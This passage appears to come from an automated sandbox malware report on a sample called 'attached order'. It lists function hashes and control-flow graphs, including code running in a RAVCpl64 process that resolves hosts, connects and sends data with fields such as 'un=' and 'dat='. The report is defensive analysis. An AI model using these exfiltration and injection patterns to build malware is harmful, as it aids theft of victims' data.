                                                                                          • Instruction Fuzzy Hash: E19002312E500442D641725855046065009A7D0241FD1C526A0418554EC6658A56BA62
                                                                                          Function 01772F30 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 633d0df01ce7743211cbc19e075bd4bedab7b6a67e0193298374bb080d4e8abf
                                                                                          • Instruction ID: 7b34ef101942b7f71ed423f88beaffc53cab221e3baf666c37e1382b88cc9aa1
                                                                                          • Opcode Fuzzy Hash: 633d0df01ce7743211cbc19e075bd4bedab7b6a67e0193298374bb080d4e8abf
                                                                                          • Instruction Fuzzy Hash: 249002212A544482D64073585904B0F910597E1202FD1C52DA414A554CC92588556722
                                                                                          Function 01772F00 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4422cbe6693ca58f284e609a33af6d0d06cdda0bd7998fd6941103daa45a5b36
                                                                                          • Instruction ID: 7f7f3848f5e4b076d0d6d762da2ee5d50c0a7d75c1a61eeff2c30de1d36e3539
                                                                                          • Opcode Fuzzy Hash: 4422cbe6693ca58f284e609a33af6d0d06cdda0bd7998fd6941103daa45a5b36
                                                                                          • Instruction Fuzzy Hash: 7B9002212B580082D70076685D14B07500597D0303F91C629A0148554CC92588616522
                                                                                          Function 01772FB0 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2f5ae2951f69a7309456b63b93829a25d9821ce2d862e555668bc3b9727490ca
                                                                                          • Instruction ID: 26d9f118e2a22d1bc8cadb7bcbb8b848ea6426504060476cf70c2b7306ddabbd
                                                                                          • Opcode Fuzzy Hash: 2f5ae2951f69a7309456b63b93829a25d9821ce2d862e555668bc3b9727490ca
                                                                                          • Instruction Fuzzy Hash: B49002212E500842D640725895147075006D7D0601F91C525A0018554DC626896576B2
                                                                                          Function 01772E50 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 25c773e42f6a9c60e426139f0373083f636462092b740cbdfba7114dc54e87fb
                                                                                          • Instruction ID: 270e8a4163c4282726ef2cee89e8c829a1a30e70c285baf328b4dc973f52d70d
                                                                                          • Opcode Fuzzy Hash: 25c773e42f6a9c60e426139f0373083f636462092b740cbdfba7114dc54e87fb
                                                                                          • Instruction Fuzzy Hash: E49002613E500482D60072585514B065005D7E1301F91C529E1058554DC629CC527127
                                                                                          Function 01772E00 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4d72e37ede629d44a0ef1ec67df78e9e001f23e13d334dea65625d232fe1a5ab
                                                                                          • Instruction ID: 143912dd03b5bc80197e302a7b867b8c900a57b5601c66aec67b03033ed1fd58
                                                                                          • Opcode Fuzzy Hash: 4d72e37ede629d44a0ef1ec67df78e9e001f23e13d334dea65625d232fe1a5ab
                                                                                          • Instruction Fuzzy Hash: F39002612A540443D64076585904607500597D0302F91C525A2058555ECA398C517136
                                                                                          Function 01772ED0 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 97e1de946c0599779913a5157082701d8c2935d3a77a6c7698b95bc41c2ebbdb
                                                                                          • Instruction ID: 9b83f90c238606dc9a9bf3fca26625273c3b862d3f7196c29b9de282e5ecfd92
                                                                                          • Opcode Fuzzy Hash: 97e1de946c0599779913a5157082701d8c2935d3a77a6c7698b95bc41c2ebbdb
                                                                                          • Instruction Fuzzy Hash: 809002216A5000824640726899449069005BBE1211791C635A098C550DC56988656666
                                                                                          Function 01772EC0 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a63c7ac71389c092c5888ce0632b677a876e1980689c7c9db9d0746a44c8f6f5
                                                                                          • Instruction ID: 440aec4a2b1688d88e7dadb0a94a8ec1a7b7df013fdef3f41a48adefe377dc6c
                                                                                          • Opcode Fuzzy Hash: a63c7ac71389c092c5888ce0632b677a876e1980689c7c9db9d0746a44c8f6f5
                                                                                          • Instruction Fuzzy Hash: 889002312A540442D60072585908747500597D0302F91C525A5158555EC675C8917532
                                                                                          Function 01772E80 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 430d6889182e2794226963145ca8fb9956932d4f2a35979dfa17613dffb5d578
                                                                                          • Instruction ID: 1044f3cae588a8b97fe7a09691604fe7b9de11e5c962e662694226566f09edea
                                                                                          • Opcode Fuzzy Hash: 430d6889182e2794226963145ca8fb9956932d4f2a35979dfa17613dffb5d578
                                                                                          • Instruction Fuzzy Hash: 259002612B500082D60472585504706504597E1201F91C526A2148554CC5398C616126
                                                                                          Function 017738D0 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 532d412334cdc3f62cae9abeb80c49ae7b256c6b4a6076ef613bc9ec70b4a456
                                                                                          • Instruction ID: 6ecf9c3b10c7a08a39e8137cdf3f7287c8a08a891faf78ba390392999fddb86a
                                                                                          • Opcode Fuzzy Hash: 532d412334cdc3f62cae9abeb80c49ae7b256c6b4a6076ef613bc9ec70b4a456
                                                                                          • Instruction Fuzzy Hash: 7F9002212E905142D650725C55046169005B7E0201F91C535A0808594DC56588557222
                                                                                          Function 01773C30 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0d0f9ac2e312ace02f9cfaadc016007638acd226f9c847cbbd633d77d426e7f8
                                                                                          • Instruction ID: 95347b13d3958e4de1010e0a5e786f3e0fe71c71db5b1b48d798d27a1239b2dc
                                                                                          • Opcode Fuzzy Hash: 0d0f9ac2e312ace02f9cfaadc016007638acd226f9c847cbbd633d77d426e7f8
                                                                                          • Instruction Fuzzy Hash: 779002312A6001829A4073586904A4E910597E1302BD1D929A0009554CC92488616222
                                                                                          Function 01773C90 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e7e0af0a6b8c723d8fe7a91dd4d0777a757b1e8b5a80c70ec55e93b66ce6189c
                                                                                          • Instruction ID: e7235c4fc950644f84e9f76114d41502a6840955bfad3e56a1ab27ba7825bfa1
                                                                                          • Opcode Fuzzy Hash: e7e0af0a6b8c723d8fe7a91dd4d0777a757b1e8b5a80c70ec55e93b66ce6189c
                                                                                          • Instruction Fuzzy Hash: 9A9002352A500442DA1072586904646504697D0301F91D925A0418558DC66488A1B122
                                                                                          Function 01772B20 Relevance: .0, Instructions: 2COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                          • Instruction ID: c2aff08f369c2087fa1630c7049d713272216a638ccc4b609e1f18454ba46c8c
                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                          • Instruction Fuzzy Hash:
                                                                                          Function 01767550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 017A4592
                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017A4507
                                                                                          • ExecuteOptions, xrefs: 017A44AB
                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017A4530
                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017A454D
                                                                                          • Execute=1, xrefs: 017A451E
                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017A4460
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                          • API String ID: 0-484625025
                                                                                          • Opcode ID: 60ae26fcf3f33704a8852edc9d23bce479de5c9f3fc36aa3bbbd944ef1e17d03
                                                                                          • Instruction ID: 3fbc9edce176049e15050643ec57748c1fe236e5122cd1def9cc4cbe79edc88b
                                                                                          • Opcode Fuzzy Hash: 60ae26fcf3f33704a8852edc9d23bce479de5c9f3fc36aa3bbbd944ef1e17d03
                                                                                          • Instruction Fuzzy Hash: BD514D316002097AEF259AA8DC99FEDF7ACEF14344F5805E9DA0697186EB709E40CF51
                                                                                          Function 01739046 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$@$@wv
                                                                                          • API String ID: 0-2230787357
                                                                                          • Opcode ID: 0ad60a3f564dc3893559fc0f94dfb5d83c625f37b4027aee497ece11132401cb
                                                                                          • Instruction ID: d79e052773d5f6b7d82dc1ff9ce1ab819292bb460c91451910d1b2344eac261b
                                                                                          • Opcode Fuzzy Hash: 0ad60a3f564dc3893559fc0f94dfb5d83c625f37b4027aee497ece11132401cb
                                                                                          • Instruction Fuzzy Hash: 3E811B72D012699BDB31DF54CC45BEEF6B8AB48714F0041DAEA1AB7251E7709E84CFA0

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.8%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:29.1%
                                                                                          Total number of Nodes:55
                                                                                          Total number of Limit Nodes:5
                                                                                          execution_graph 6151 360aa52 6152 360a9f6 6151->6152 6153 360aa58 6151->6153 6154 360aac0 LdrLoadDll 6153->6154 6155 360aa84 6153->6155 6154->6155 6156 3609473 6157 360944e socket 6156->6157 6158 3609477 6156->6158 6159 3600948 6161 3600967 6159->6161 6160 36009f2 6161->6160 6162 36009c4 CreateThread 6161->6162 6163 3601598 6164 36015b4 6163->6164 6165 360164a 6164->6165 6166 36015db SleepEx 6164->6166 6169 36000b8 6164->6169 6174 3600208 6164->6174 6166->6164 6170 36000fd 6169->6170 6171 360019a 6170->6171 6173 3600183 SleepEx 6170->6173 6178 360d8e8 6170->6178 6171->6164 6171->6171 6173->6170 6175 3600224 6174->6175 6177 36002df 6174->6177 6176 360d8e8 6 API calls 6175->6176 6176->6177 6177->6164 6180 360d95b 6178->6180 6179 360d981 6179->6170 6180->6179 6182 3601af8 6180->6182 6183 3601b2d 6182->6183 6186 3601c83 6183->6186 6189 3601e01 6183->6189 6208 36093d8 6183->6208 6185 3601d53 6185->6189 6195 3601dd5 6185->6195 6202 36095c8 6185->6202 6186->6185 6188 3601d2b getaddrinfo 6186->6188 6186->6189 6188->6185 6189->6179 6190 360211c 6211 3609668 6190->6211 6193 3602278 6196 3609668 closesocket 6193->6196 6194 360232d 6197 360234f SleepEx 6194->6197 6199 360235b 6194->6199 6195->6189 6195->6190 6201 360215c 6195->6201 6196->6189 6197->6199 6198 3609668 closesocket 6198->6189 6199->6198 6200 3602204 6205 3609518 6200->6205 6201->6193 6201->6200 6203 3609611 6202->6203 6204 3609642 connect 6203->6204 6204->6195 6207 3609561 6205->6207 6206 3609592 send 6206->6194 6207->6206 6209 3609420 6208->6209 6210 3609451 socket 6209->6210 6210->6186 6213 36096a5 6211->6213 6212 36096d6 closesocket 6212->6189 6213->6212

                                                                                          Executed Functions

                                                                                          Function 03601AF8 Relevance: 9.6, APIs: 2, Strings: 3, Instructions: 840COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 3601af8-3601b2b 1 3601b47-3601b86 0->1 2 3601b2d-3601b42 call 360d1a8 0->2 4 3601ba6-3601bae 1->4 5 3601b88-3601b8c 1->5 2->1 6 3601bb4-3601bbd 4->6 7 360251d-360252c 4->7 5->4 8 3601b8e-3601b92 5->8 6->7 10 3601bc3-3601be1 6->10 8->4 9 3601b94-3601b98 8->9 9->4 11 3601b9a-3601b9e 9->11 12 3601bf2-3601bf6 10->12 13 3601be3-3601beb 10->13 11->4 14 3601ba0-3601ba4 11->14 15 3601bf8-3601bfc 12->15 16 3601bfe-3601bff 12->16 13->12 14->4 14->6 15->16 17 3601c09-3601c12 15->17 16->17 18 3601c14-3601c18 17->18 19 3601c2c-3601c30 17->19 21 3601c3a-3601c61 18->21 22 3601c1a-3601c2a 18->22 20 3601c32-3601c33 19->20 19->21 20->21 23 3601c63-3601c67 21->23 24 3601c69-3601ca8 call 36093d8 21->24 22->20 23->24 25 3601cae-3601cb4 23->25 24->25 30 360250d-3602516 24->30 28 3601d67-3601d77 25->28 29 3601cba-3601cc2 25->29 28->30 31 3601d7d-3601d90 28->31 32 3601cc4-3601cee call 35fc2f8 call 360ce48 29->32 33 3601cf5-3601d09 29->33 30->7 34 3601da2-3601db3 31->34 35 3601d92-3601d9f call 3609348 31->35 32->33 33->30 37 3601d0f-3601d15 33->37 39 3601db5-3601dd0 call 36095c8 34->39 40 3601e0e-3601e2f 34->40 35->34 37->30 42 3601d1b-3601d1d 37->42 52 3601dd5-3601dff 39->52 47 3601e31-3601e52 call 360d1a8 40->47 48 3601e54-3601e58 40->48 42->30 46 3601d23-3601d25 42->46 46->30 54 3601d2b-3601d51 getaddrinfo 46->54 59 3601ea8 call 360d1a8 47->59 50 3602505-3602506 48->50 51 3601e5e-3601e62 48->51 50->30 51->50 56 3601e68-3601e6c 51->56 52->40 57 3601e01-3601e09 52->57 54->28 58 3601d53-3601d5c 54->58 60 3601e74-3601ea1 call 360d1a8 56->60 61 3601e6e-3601e72 56->61 57->50 58->28 62 3601ead-3601f7a call 360d178 call 36097b8 call 360a8c8 * 2 call 360d178 call 3609d68 call 360d368 59->62 60->59 61->60 61->62 80 3601f92-3601fbd 62->80 81 3601f7c-3601f80 62->81 83 36020b2-36020e0 call 3603f08 80->83 84 3601fc3-3601fc7 80->84 81->80 82 3601f82-3601f8f call 3603308 81->82 82->80 92 36020e2-36020e6 83->92 93 360211c-3602157 call 3609668 83->93 84->83 85 3601fcd-36020b0 call 360d5f8 * 3 call 360d368 * 2 call 360a8c8 * 2 84->85 85->92 95 3602267-3602276 call 360d368 92->95 96 36020ec-36020f0 92->96 93->50 107 36022f7-360232f call 35fc088 call 3609518 95->107 108 3602278 95->108 96->95 99 36020f6-360211a call 3603f38 96->99 99->93 111 360215c-36021de call 360d368 call 360d178 call 360d368 call 3609d68 call 360d368 * 3 99->111 127 3602331-3602347 107->127 128 360235b-360235f 107->128 112 3602282-36022e6 call 35fc088 call 360e548 call 3609668 108->112 169 36021e0-36021f6 call 360d368 call 360d178 111->169 170 36021fb-3602202 111->170 112->50 127->128 131 3602349-360234d 127->131 133 3602361-3602365 128->133 134 3602373-360238a 128->134 131->128 139 360234f-3602356 SleepEx 131->139 141 36024a5-36024e9 call 3609668 133->141 142 360236b-360236d 133->142 135 36023a8-360244c call 360d1a8 call 360d178 134->135 136 360238c-36023a2 134->136 163 3602492-360249f 135->163 164 360244e 135->164 136->135 136->141 139->141 141->50 152 36024eb-36024fd 141->152 142->134 142->141 152->50 155 3602500 call 360d1a8 152->155 155->50 163->141 164->163 166 3602450-3602455 164->166 166->163 168 3602457-3602490 166->168 168->163 168->164 169->170 171 3602204-360220d 170->171 172 360227a-360227f 170->172 174 360223c-3602251 171->174 175 360220f-3602218 171->175 172->112 174->107 181 3602257-3602262 174->181 179 360221a-3602226 175->179 180 360222d-3602236 175->180 179->180 180->174 182 36022eb-36022f4 180->182 181->107 182->107
                                                                                          APIs
                                                                                          • getaddrinfo.WS2_32 ref: 03601D4D
                                                                                            • Part of subcall function 036095C8: connect.WS2_32 ref: 0360964B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: connectgetaddrinfo
                                                                                          • String ID: &br=$&un=$dat=
                                                                                          • API String ID: 2413327212-1268146196
                                                                                          • Opcode ID: 475ef4336c667f13d33c0465ceef0c3a6bf2c67fbd6a3517a13c86e7a21448c5
                                                                                          • Instruction ID: d6c7ae246726edb4a758b715935dcdea6dd4cc981bd1ef5bcc9c8005501b81ad
                                                                                          • Opcode Fuzzy Hash: 475ef4336c667f13d33c0465ceef0c3a6bf2c67fbd6a3517a13c86e7a21448c5
                                                                                          • Instruction Fuzzy Hash: 13529D34518B488FCB6DEF68C495AEEB7E1FB99304F540A2ED48AC7292DB30D446CB45
                                                                                          Function 03601948 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 373COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 183 3601948-360194c 184 36019cd-36019cf 183->184 185 360194e-3601963 183->185 187 36019d2-36019db 184->187 188 3601a1f-3601a24 184->188 186 36019bf 185->186 187->184 188->186 190 3601a26 188->190 191 3601a27-3601a31 190->191 193 3601a33-3601a36 191->193 194 3601a4b-3601a64 191->194 195 3601a3a-3601a4a 193->195 194->191 196 3601a66-3601a6e 194->196 195->194 196->195 197 3601a70-3601a71 196->197 198 3601a72-3601a77 197->198 199 3601a7a-3601a9a 198->199 200 3601a0d-3601a1b 198->200 199->198 201 3601a9c-3601abf 199->201 200->188 202 3601ac1-3601ad0 201->202 203 3601b2f-3601b3f 201->203 207 3601ad2-3601ad9 202->207 208 3601ada-3601af0 call 360d1a8 202->208 205 3601b47-3601b86 203->205 206 3601b42 call 360d1a8 203->206 209 3601ba6-3601bae 205->209 210 3601b88-3601b8c 205->210 206->205 207->208 211 3601bb4-3601bbd 209->211 212 360251d-360252c 209->212 210->209 214 3601b8e-3601b92 210->214 211->212 216 3601bc3-3601be1 211->216 214->209 215 3601b94-3601b98 214->215 215->209 218 3601b9a-3601b9e 215->218 219 3601bf2-3601bf6 216->219 220 3601be3-3601beb 216->220 218->209 221 3601ba0-3601ba4 218->221 222 3601bf8-3601bfc 219->222 223 3601bfe-3601bff 219->223 220->219 221->209 221->211 222->223 224 3601c09-3601c12 222->224 223->224 225 3601c14-3601c18 224->225 226 3601c2c-3601c30 224->226 228 3601c3a-3601c61 225->228 229 3601c1a-3601c2a 225->229 227 3601c32-3601c33 226->227 226->228 227->228 230 3601c63-3601c67 228->230 231 3601c69-3601ca8 call 36093d8 228->231 229->227 230->231 232 3601cae-3601cb4 230->232 231->232 237 360250d-3602516 231->237 235 3601d67-3601d77 232->235 236 3601cba-3601cc2 232->236 235->237 238 3601d7d-3601d90 235->238 239 3601cc4-3601cee call 35fc2f8 call 360ce48 236->239 240 3601cf5-3601d09 236->240 237->212 241 3601da2-3601db3 238->241 242 3601d92-3601d9f call 3609348 238->242 239->240 240->237 244 3601d0f-3601d15 240->244 246 3601db5-3601dff call 36095c8 241->246 247 3601e0e-3601e2f 241->247 242->241 244->237 249 3601d1b-3601d1d 244->249 246->247 264 3601e01-3601e09 246->264 254 3601e31-3601e52 call 360d1a8 247->254 255 3601e54-3601e58 247->255 249->237 253 3601d23-3601d25 249->253 253->237 261 3601d2b-3601d51 getaddrinfo 253->261 266 3601ea8 call 360d1a8 254->266 257 3602505-3602506 255->257 258 3601e5e-3601e62 255->258 257->237 258->257 263 3601e68-3601e6c 258->263 261->235 265 3601d53-3601d5c 261->265 267 3601e74-3601ea1 call 360d1a8 263->267 268 3601e6e-3601e72 263->268 264->257 265->235 269 3601ead-3601f7a call 360d178 call 36097b8 call 360a8c8 * 2 call 360d178 call 3609d68 call 360d368 266->269 267->266 268->267 268->269 287 3601f92-3601fbd 269->287 288 3601f7c-3601f80 269->288 290 36020b2-36020e0 call 3603f08 287->290 291 3601fc3-3601fc7 287->291 288->287 289 3601f82-3601f8f call 3603308 288->289 289->287 299 36020e2-36020e6 290->299 300 360211c-3602157 call 3609668 290->300 291->290 292 3601fcd-36020b0 call 360d5f8 * 3 call 360d368 * 2 call 360a8c8 * 2 291->292 292->299 302 3602267-3602276 call 360d368 299->302 303 36020ec-36020f0 299->303 300->257 314 36022f7-360232f call 35fc088 call 3609518 302->314 315 3602278 302->315 303->302 306 36020f6-360211a call 3603f38 303->306 306->300 318 360215c-36021de call 360d368 call 360d178 call 360d368 call 3609d68 call 360d368 * 3 306->318 334 3602331-3602347 314->334 335 360235b-360235f 314->335 319 3602282-36022e6 call 35fc088 call 360e548 call 3609668 315->319 376 36021e0-36021f6 call 360d368 call 360d178 318->376 377 36021fb-3602202 318->377 319->257 334->335 338 3602349-360234d 334->338 340 3602361-3602365 335->340 341 3602373-360238a 335->341 338->335 346 360234f-3602356 SleepEx 338->346 348 36024a5-36024e9 call 3609668 340->348 349 360236b-360236d 340->349 342 36023a8-360244c call 360d1a8 call 360d178 341->342 343 360238c-36023a2 341->343 370 3602492-360249f 342->370 371 360244e 342->371 343->342 343->348 346->348 348->257 359 36024eb-36024fd 348->359 349->341 349->348 359->257 362 3602500 call 360d1a8 359->362 362->257 370->348 371->370 373 3602450-3602455 371->373 373->370 375 3602457-3602490 373->375 375->370 375->371 376->377 378 3602204-360220d 377->378 379 360227a-360227f 377->379 381 360223c-3602251 378->381 382 360220f-3602218 378->382 379->319 381->314 388 3602257-3602262 381->388 386 360221a-3602226 382->386 387 360222d-3602236 382->387 386->387 387->381 389 36022eb-36022f4 387->389 388->314 389->314
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: M
                                                                                          • API String ID: 0-3664761504
                                                                                          • Opcode ID: 969cefb17367735f4a3f1ee73cec7de3cafb7f7c8e8f3abc517778c824c22857
                                                                                          • Instruction ID: cf512a9ae519eafc84687d425dc7811d3783aff377d96cc71fc62b5cf8b8dea7
                                                                                          • Opcode Fuzzy Hash: 969cefb17367735f4a3f1ee73cec7de3cafb7f7c8e8f3abc517778c824c22857
                                                                                          • Instruction Fuzzy Hash: F5C126759087488FCB6EDF68D4856EAB7F0FB46304F18066ED49EC7292EB309542CB45
                                                                                          Function 03601AF3 Relevance: 1.8, APIs: 1, Instructions: 277COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 390 3601af3-3601b2b 391 3601b47-3601b86 390->391 392 3601b2d-3601b42 call 360d1a8 390->392 394 3601ba6-3601bae 391->394 395 3601b88-3601b8c 391->395 392->391 396 3601bb4-3601bbd 394->396 397 360251d-360252c 394->397 395->394 398 3601b8e-3601b92 395->398 396->397 400 3601bc3-3601be1 396->400 398->394 399 3601b94-3601b98 398->399 399->394 401 3601b9a-3601b9e 399->401 402 3601bf2-3601bf6 400->402 403 3601be3-3601beb 400->403 401->394 404 3601ba0-3601ba4 401->404 405 3601bf8-3601bfc 402->405 406 3601bfe-3601bff 402->406 403->402 404->394 404->396 405->406 407 3601c09-3601c12 405->407 406->407 408 3601c14-3601c18 407->408 409 3601c2c-3601c30 407->409 411 3601c3a-3601c61 408->411 412 3601c1a-3601c2a 408->412 410 3601c32-3601c33 409->410 409->411 410->411 413 3601c63-3601c67 411->413 414 3601c69-3601ca8 call 36093d8 411->414 412->410 413->414 415 3601cae-3601cb4 413->415 414->415 420 360250d-3602516 414->420 418 3601d67-3601d77 415->418 419 3601cba-3601cc2 415->419 418->420 421 3601d7d-3601d90 418->421 422 3601cc4-3601cee call 35fc2f8 call 360ce48 419->422 423 3601cf5-3601d09 419->423 420->397 424 3601da2-3601db3 421->424 425 3601d92-3601d9f call 3609348 421->425 422->423 423->420 427 3601d0f-3601d15 423->427 429 3601db5-3601dff call 36095c8 424->429 430 3601e0e-3601e2f 424->430 425->424 427->420 432 3601d1b-3601d1d 427->432 429->430 447 3601e01-3601e09 429->447 437 3601e31-3601e52 call 360d1a8 430->437 438 3601e54-3601e58 430->438 432->420 436 3601d23-3601d25 432->436 436->420 444 3601d2b-3601d51 getaddrinfo 436->444 449 3601ea8 call 360d1a8 437->449 440 3602505-3602506 438->440 441 3601e5e-3601e62 438->441 440->420 441->440 446 3601e68-3601e6c 441->446 444->418 448 3601d53-3601d5c 444->448 450 